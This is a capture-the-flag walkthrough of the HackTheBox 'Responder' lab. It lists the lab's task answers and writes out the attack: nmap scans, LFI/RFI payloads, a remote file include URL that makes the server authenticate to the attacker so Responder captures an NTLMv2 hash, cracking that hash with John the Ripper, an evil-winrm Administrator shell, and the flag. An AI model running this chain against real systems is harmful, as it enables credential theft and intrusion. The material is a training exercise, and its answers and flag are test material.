Responder Starting Point is a very good Challenge by HackTheBox. In this article we are going exploit it.
First of all visit the ip_address in your browser.
Oh oh! Website is not live?
If you observe closely you will see that it tries to load but due to some issues it is unable to load to load it and also our ip_address is changed to a domain unika.htb. So we have to edit a file to access it.
wesecure1337@kali:~$ sudo nano /etc/hosts
127.0.0.1 localhost
10.129.247.235 unika.htbAfter editing the file /etc/passwd visit the site again and you will be able to see the site.
Now we are going to scan this site for available services
wesecure1337@kali:~$ nmap -sV 10.129.247.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 17:53 IST
Nmap scan report for 10.129.247.235
Host is up (0.25s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.43 seconds
From the scan result we conclude that only one port 80/tcp is open. So I submitted the Task 1 but wait I got the Wrong Answer. Is there something wrong with nmap. Here’s the catch if you don’t specify the port number to nmap then it scans for 1000 top most used ports. It means that we have to scan for all the ports to get the result. So I scanned the all ports
wesecure1337@kali:~$ nmap -sV -p- 10.129.247.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 17:53 IST
Stats: 0:08:18 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 02.15% done; ETC: 18:06 (10:03:20 remaining)
Stats: 3:17:85 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 38.73% done; ETC: 18:06 (08:27:02 remaining)This is the time it requires for my intel i3 11th generation processor.
So I have to figure out some other way. I going to scan for first 10000 ports
wesecure1337@kali:~$ nmap -sV -p1-10000 10.129.247.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-28 18:13 IST
Nmap scan report for unika.htb (10.129.247.235)
Host is up (0.24s latency).
Not shown: 5998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.93 seconds
From the Scan results I found some useful information.
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsNow again let’s answer the Task 1
TASK 1How many TCP ports are open on the machine?
2
We got the correct answer. Wow!!!
As we have noticed when we visited the ip_address some other domain unika.htbjust came out
TASK 2When visiting the web service using the IP address, what is the domain that we are being redirected to?
unika.htb
From our scan results we see that PHP/8.1.1 is used on the server side as scripting language.
TASK 3Which scripting language is being used on the server to generate webpages?
php
Looking at the source code of the website we see that page parameter is being used.
TASK 4What is the name of the URL parameter which is used to load different language versions of the webpage?
page
lfi is vulnerability when user accesses more file than he has intended to. So looking at the options we came across the Task 5
TASK 5Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
../../../../../../../../windows/system32/drivers/etc/hosts
In the case of rfi
TASK 6Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
//10.10.14.6/somefile
Simple googling brings us to
TASK 7What does NTLM stand for?
New Technology Lan Manager
-I flag is used to specify the network interface
TASK 8Which flag do we use in the Responder utility to specify the network interface?
-I
john is a preinstalled tool in kali linux which serves for many brute forcing attacks
TASK 9There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.
John The Ripper
Now we have to exploit the server
First of all get the Respondertool from the github
wesecure1337@kali:~$ git clone https://github.com/lgandx/Responder
wesecure1337@kali:~$ cd Responder
wesecure1337@kali:~$ python3 Responder.py -I tun0This will start Responder on our tun0 interface.
Now get you tun0 ip_address from the terminal
wesecure1337@kali:~$ ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet your_tun0_ip netmask 255.255.254.0 destination 10.10.16.80
inet6 dead:beef:4::104e prefixlen 64 scopeid 0x0<global>
inet6 fe80::ac34:ad8a:3c3f:7e18 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 2995 bytes 2652631 (2.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 152234 bytes 9137041 (8.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Visit the url
http://unika.htb/?page=//[your_tun0_ip]/wesecure1337After visiting the url go to your Responder terminal to see the hash
[+] Listening for events...[SMB] NTLMv2-SSP Client : 10.129.247.235
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:5088e52725bb2272:169A8973FCEF5ED2A2084923D9E90F41:010100000000000080319CECB1A2D8012FFAAC91932405CF0000000002000800310045005100360001001E00570049004E002D0039004400460043004C0047004B00320053005400330004003400570049004E002D0039004400460043004C0047004B0032005300540033002E0031004500510036002E004C004F00430041004C000300140031004500510036002E004C004F00430041004C000500140031004500510036002E004C004F00430041004C000700080080319CECB1A2D80106000400020000000800300030000000000000000100000000200000AF555891CCB03280F0D7B0CBC6AD5027FA8F41A7D7A6B4B990345524D25C169D0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380030000000000000000000
Copy the hash file and save it to wesecure1337.txt file
Now we are going to use john the ripper to brute force this password hash.
wesecure1337@kali:~$ john wesecure1337.txt --wordlist=/usr/share/wordlists/rockyou.txtUsing default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2022-07-28 18:55) 100.0g/s 409600p/s 409600c/s 409600C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
From this we finally cracked the administrator password which is badminton
TASK 10What is the password for the administrator user?
badminton
From our scan results
TASK 11We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
5985
Now follow the steps to get the flag
wesecure1337@kali:~$ evil-winrm -i 10.129.247.235 -u administrator -p badmintonEvil-WinRM shell v3.3Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machineData: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Administrator\Documents>
Now we got shell in the server.
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> lsDirectory: C:\Users\AdministratorMode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/11/2020 7:19 AM 3D Objects
d-r--- 10/11/2020 7:19 AM Contacts
d-r--- 3/9/2022 5:34 PM Desktop
d-r--- 3/10/2022 4:51 AM Documents
d-r--- 10/11/2020 7:19 AM Downloads
d-r--- 10/11/2020 7:19 AM Favorites
d-r--- 10/11/2020 7:19 AM Links
d-r--- 10/11/2020 7:19 AM Music
d-r--- 4/27/2020 6:01 AM OneDrive
d-r--- 10/11/2020 7:19 AM Pictures
d-r--- 10/11/2020 7:19 AM Saved Games
d-r--- 10/11/2020 7:19 AM Searches
d-r--- 10/11/2020 7:19 AM Videos*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users\> lsDirectory: C:\UsersMode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/9/2022 5:35 PM Administrator
d----- 3/9/2022 5:33 PM mike
d-r--- 10/10/2020 12:37 PM Public*Evil-WinRM* PS C:\Users> cd mike
*Evil-WinRM* PS C:\Users\mike> lsDirectory: C:\Users\mikeMode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2022 4:51 AM Desktop*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> lsDirectory: C:\Users\mike\DesktopMode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2022 4:50 AM 32 flag.txt*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
*Evil-WinRM* PS C:\Users\mike\Desktop>
Finally we got the flag
SUBMIT FLAGSubmit root flag
ea81b7afddd03efaa0945333ed147fac
Voila!!! We have successfully solved the Responder Starting Point HacktheBox challenge. If you really enjoyed the writeup[walkthrough] do checkout our other writeups on related topics.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
If you want to appreciate and support my work here you go…
Thanks for Reading!!!
